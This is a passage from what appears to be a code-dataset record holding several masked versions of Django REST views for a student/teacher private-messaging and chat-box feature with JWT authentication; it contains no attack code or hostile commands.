try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-2": "<mask token>\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuSearchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '1' and username == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n",
"step-3": "<mask token>\n\n\nclass enterPrivateLetterView(APIView):\n <mask token>\n\n\nclass getRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderTea_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverTea_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass closeChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass openChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass searchContactView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.GET['receiver']\n identity = request.GET['identity']\n iden = 4\n if identity == '0' and user_id == receiver:\n iden = 3\n elif identity == '0':\n user = Teacher.objects.filter(id=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 0\n else:\n user = Student.objects.filter(stu_num=receiver).first()\n if not user:\n iden = 4\n else:\n iden = 1\n data = {'identity': iden, 'receiver': receiver}\n return Response({'status': 200, 'msg': '返回成功', 'data': data})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuGetPrivateLetterListsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n data_list = []\n for item in ChatBoxIsOpen.objects.filter(Q(senderStu_id=user_id\n ) & Q(isOpen=1)):\n msgList = []\n msgList1 = []\n msgList2 = []\n receiver = item.receiverTea_id\n identity = 0\n if item.receiverStu_id != None:\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n identity = 1\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverStu_id=item.\n receiverStu_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=item.receiverStu_id) & Q(\n receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n else:\n for item2 in PrivateLetter.objects.filter(Q(\n senderStu_id=user_id) & Q(receiverTea_id=receiver)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 1}\n msgList1.append(data)\n for item2 in PrivateLetter.objects.filter(Q(\n senderTea_id=receiver) & Q(receiverStu_id=user_id)):\n data = {'id': item2.id, 'message': item2.message,\n 'time': str(item2.time.strftime(\n '%Y-%m-%d %H:%M:%S')), 'new': item2.new,\n 'Ienter': 2}\n msgList2.append(data)\n len1 = len(msgList1)\n len2 = len(msgList2)\n i1 = 0\n i2 = 0\n for i in range(0, len1 + len2):\n if i1 >= len1:\n msgList.append(msgList2[i2])\n i2 += 1\n elif i2 >= len2:\n msgList.append(msgList1[i1])\n i1 += 1\n elif msgList1[i1]['time'] < msgList2[i2]['time']:\n msgList.append(msgList1[i1])\n i1 += 1\n else:\n msgList.append(msgList2[i2])\n i2 += 1\n data = {'id': item.id, 'receiver': receiver, 'msgList':\n msgList, 'name': receiver + str(identity), 'identity':\n identity}\n data_list.append(data)\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuEnterPrivateLetterView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n username = payload['username']\n receiver = request.data.get('receiver')\n message = request.data.get('message')\n identity = request.data.get('identity')\n if identity == 0:\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverTea_id=receiver, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderTea_id\n =receiver) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderTea_id=receiver,\n receiverStu_id=user_id)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n privateLetter = PrivateLetter(senderStu_id=user_id,\n receiverStu_id=receiverStu_id, message=message)\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =receiverStu_id) & Q(receiverStu_id=user_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=\n receiverStu_id, receiverStu_id=user_id)\n privateLetter.save()\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': '发布私信成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuRecentContactsView(APIView):\n\n def get(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n data_list = []\n for item in PrivateLetter.objects.filter(senderStu_id=user_id):\n if item.receiverTea_id != None and item.receiverTea_id != '':\n identity = 0\n receiver = item.receiverTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.receiverStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n for item in PrivateLetter.objects.filter(receiverStu_id=user_id):\n if item.senderTea_id != None and item.senderTea_id != '':\n identity = 0\n receiver = item.senderTea_id\n else:\n identity = 1\n receiver = Student.objects.filter(id=item.senderStu_id\n ).first().stu_num\n data = {'receiver': receiver, 'identity': identity}\n data_list.append(data)\n lenData = len(data_list)\n dict = {}\n data_list1 = []\n for i in range(lenData - 1, -1, -1):\n if data_list[i]['receiver'] + str(data_list[i]['identity']\n ) not in dict:\n dict[data_list[i]['receiver'] + str(data_list[i][\n 'identity'])] = '1'\n data_list1.append(data_list[i])\n return Response({'status': 200, 'msg': '返回成功', 'data': data_list1})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuCloseChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n iden = request.data.get('iden')\n if iden == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n else:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=Student.objects.filter(\n stu_num=receiver).first().id)).first()\n chatBoxIsOpen.delete()\n return Response({'status': 200, 'msg': '返回成功'})\n except Exception as e:\n return Response({'status': 204, 'msg': '遇到了异常错误', 'err': e.args})\n\n\nclass stuOpenChatBoxView(APIView):\n\n def post(self, request, *args, **kwargs):\n try:\n try:\n payload = JwtQueryParamAuthentication.authenticate(self,\n request)[0]\n except Exception as e:\n return Response({'status': 403, 'msg': '未登录', 'err': e.args})\n user_id = payload['id']\n receiver = request.data.get('receiver')\n identity = request.data.get('identity')\n if identity == 0:\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverTea_id=receiver)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverTea_id=receiver)\n else:\n receiverStu_id = Student.objects.filter(stu_num=receiver\n ).first().id\n chatBoxIsOpen = ChatBoxIsOpen.objects.filter(Q(senderStu_id\n =user_id) & Q(receiverStu_id=receiverStu_id)).first()\n if not chatBoxIsOpen:\n chatBoxIsOpen = ChatBoxIsOpen(senderStu_id=user_id,\n receiverStu_id=receiverStu_id)\n chatBoxIsOpen.save()\n return Response({'status': 200, 'msg': 